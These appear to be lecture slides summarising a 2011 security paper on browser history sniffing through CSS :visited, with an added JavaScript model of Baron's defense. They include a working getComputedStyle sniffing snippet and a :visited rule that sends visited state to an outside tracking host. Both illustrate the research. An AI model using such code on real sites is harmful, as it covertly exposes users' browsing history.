I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history
Zachary Weinberg, Eric Y. Chen, Pavithra Ramesh Jayaraman, Collin Jackson
Carnegie Mellon University
IEEE Symposium on Security and Privacy, May 2011
Outline Introduction Automated Attacks Exp 1: Interactive Attacks Exp 2: Side-Channel Attacks Related Work Conclusion
Introduction
• History sniffing through CSS :visited
• Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271
• in HTML:
    <a id="link1" href="http://google.com/">Visit Google!</a>
• in CSS:
    #link1:visited {
      color: red;
      background: url(http://140.115.53.28/track.php?url=google.com);
    }
Introduction
• L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy
• make getComputedStyle act as though all links are unvisited
• make certain CSS selectors act as though links are always unvisited
• limit the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke
• The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense
• Still vulnerable to interactive attacks
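As an added illustration (not code from the paper, the slides, or any browser engine), the following JavaScript models the property whitelist half of Baron's defense: a small parser for flat CSS rules that keeps only the permitted properties inside any :visited rule and reports what it stripped. It does not model the other half (getComputedStyle reporting the unvisited style). The sample stylesheet is constructed for the example and mirrors Clover's tracking rule; `tracker.example` is a placeholder host.

```javascript
// Properties Baron's defense still lets a :visited rule change (the list from the slide).
const VISITED_ALLOWED = new Set([
  'color', 'background-color', 'outline-color', 'column-rule-color', 'fill', 'stroke',
]);
// border-*-color covers border-color and the four per-side variants.
const BORDER_COLOR_RE = /^border(-(top|right|bottom|left))?-color$/;

function isAllowedForVisited(prop) {
  const p = prop.trim().toLowerCase();
  return VISITED_ALLOWED.has(p) || BORDER_COLOR_RE.test(p);
}

// Minimal parser for flat "selector { prop: value; ... }" rules.
// Assumption: no @media blocks, nesting or comments in the input.
function parseRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(css)) !== null) {
    const selector = m[1].trim();
    const decls = m[2].split(';').map(s => s.trim()).filter(Boolean).map(d => {
      const i = d.indexOf(':'); // first colon separates property from value (url(http://...) keeps its colons)
      return { prop: d.slice(0, i).trim(), value: d.slice(i + 1).trim() };
    });
    rules.push({ selector, decls });
  }
  return rules;
}

// Does any selector in a comma-separated list target :visited?
function targetsVisited(selector) {
  return selector.split(',').some(s => /:visited\b/.test(s));
}

function serialize(rules) {
  return rules
    .map(r => `${r.selector} { ${r.decls.map(d => `${d.prop}: ${d.value}`).join('; ')}; }`)
    .join('\n');
}

// Apply the whitelist: in :visited rules drop every disallowed property,
// leave all other rules untouched, and return what was removed.
function filterVisitedRules(css) {
  const kept = [];
  const dropped = [];
  for (const rule of parseRules(css)) {
    if (!targetsVisited(rule.selector)) { kept.push(rule); continue; }
    const allowed = [];
    for (const d of rule.decls) {
      if (isAllowedForVisited(d.prop)) allowed.push(d);
      else dropped.push({ selector: rule.selector, prop: d.prop, value: d.value });
    }
    if (allowed.length) kept.push({ selector: rule.selector, decls: allowed });
  }
  return { css: serialize(kept), dropped };
}

// Constructed sample: an ordinary rule, Clover-style image beacon, and layout changes.
const SAMPLE_CSS = `
a { color: blue; }
#link1:visited { color: red; background: url(http://tracker.example/track.php?url=google.com); }
a:visited { border-left-color: green; font-size: 20px; display: none; }
`;

const result = filterVisitedRules(SAMPLE_CSS);
console.log(result.css);
console.log('stripped:', result.dropped.map(d => `${d.selector} -> ${d.prop}`));
```

Only the colour change survives in the :visited rules; the image beacon (`background`) and the layout-affecting `font-size` and `display` declarations, which are exactly what the indirect and timing attacks later in the deck rely on, are reported as stripped.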
Introduction
• Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications
• Real-world sniffers probe only small sets of links (6~220)
• Found on 46 popular websites, including one in the Alexa Top 100
• Such small link sets are what make interactive attacks practical
Introduction
• What can history sniffers do?
• Benign:
  • Websites could use history sniffing to determine whether their users have visited known phishing sites.
  • Websites could seed visitors' history with URLs made up for the purpose, and use those URLs to re-identify their visitors (like cookies).
• Malicious:
  • Track visitors across sites for advertising purposes, determining whether they also visit a site's competitors.
  • Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit.
Automated Attacks
• Direct sniffing: read the computed style of a link whose :visited rule sets a colour
    <style> a:visited { color: red; } </style>
    var url_array = new Array('http://a.com', 'http://b.com');
    var visited_array = new Array();
    var link_el = document.createElement('a');
    var computed_style = document.defaultView.getComputedStyle(link_el, "");
    for (var i = 0; i < url_array.length; i++) {
      link_el.href = url_array[i];
      if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)') {
        visited_array.push(url_array[i]);
      }
    }
Automated Attacks
• Indirect sniffing
  • Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements.
  • Make visited and unvisited links cause different images to load.
    • background-image style used in the :visited rule
    • Does not require JavaScript
Automated Attacks
• Side-channel sniffing
  • Timing attacks: the attacker can make the page take longer to lay out if a link is visited than if it is unvisited
  • Any style difference in the :visited rule can serve, e.g. transparency or underlining
• Defense
  • Baron's solution does well against all 3 types above (direct/indirect/side-channel)
Exp 1: Interactive Attacks
• Require victims to interact with malicious sites
• The authors claim that interactive attacks can be disguised as "normal" interactive tasks that users will not find surprising or suspicious
• Amazon's Mechanical Turk: 307 participants recruited
• All tasks in this experiment operate within the constraints of Baron's defense
  • Visited-link styles only change the colour on the screen
• Pretend to be CAPTCHA tests
  • CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart
Exp 1: Interactive Attacks
• Word CAPTCHA
  • Each word is a hyperlink to a URL that the attacker wishes to probe
  • If unvisited, it is drawn in the same colour as the background, so the user types only the visited words
Exp 1: Interactive Attacks
• Character CAPTCHA
  • Seven-segment LCD symbols
  • Every letter represents 3 URLs
  • Site-supplied font
Exp 1: Interactive Attacks
• Each of the 3 URLs lights one segment pattern (4, 5 or F); the segments of the visited URLs overlay into one glyph:
  4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8
• The middle segment "–" is always on, so a letter with no visited URL still shows a shape
Exp 1: Interactive Attacks
• Chessboard puzzle
  • Each square contains a URL
  • Only the pawns corresponding to visited sites are made visible
  • Using SVG or text to control the pawns
Exp 1: Interactive Attacks
• Pattern-matching puzzle
Exp 1: Interactive Attacks Randomly generated task instances corresponding to known proportions of visited and unvisited links.
Exp 1: Interactive Attacks
• Automated history-sniffing exploits were also run against all participants
  • URL set from wtikay.com
  • 7012 commonly visited URLs (from the Alexa Top 5000)
Exp 2: Side-channel Attacks
• Webcam attacks: the page blinks (<blink>) according to visited state and the webcam picks up the changing screen light
• Random 20 URLs, 10 of them visited
• Variant 1: designed to comply with the WCAG standard for seizure safety
• Variant 2: make the entire browser window flash, in a brighter colour
Exp 2: Side-channel Attacks
• Author test
  • 100% accuracy for both variants in all conditions tested
    • Well-lit room
    • Person stays still in front of the computer
  • In a dark room, accuracy dropped to 50%
• Field test
  • 60 / 307 participants
Exp 2: Side-channel Attacks Field test
Exp 2: Side-channel Attacks
• In real life, a ChatRoulette-style service already has webcam access
• The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor
Related Work
• Page cache: Felten et al., Timing Attacks on Web Privacy
• DNS cache: Felten et al., Timing Attacks on Web Privacy
• Both tactics above work only the first time a site is probed and only reveal short-term history
• Resources loadable cross-origin but only available to logged-in users
  • Facebook, Gmail, Twitter, etc.
  • Login state detected via the JavaScript onerror event
Related Work
• Cookies, Flash Player local shared objects
• Ad-blockers, private browsing mode
Conclusion
• Automated history-sniffing attacks have successfully been blocked by Baron's solution
• Interactive attacks have not
• This paper developed proofs of concept for 6 history-sniffing exploits that work against Baron's defense
  • 4 interactive attacks
  • 2 attacks that observe the screen through a webcam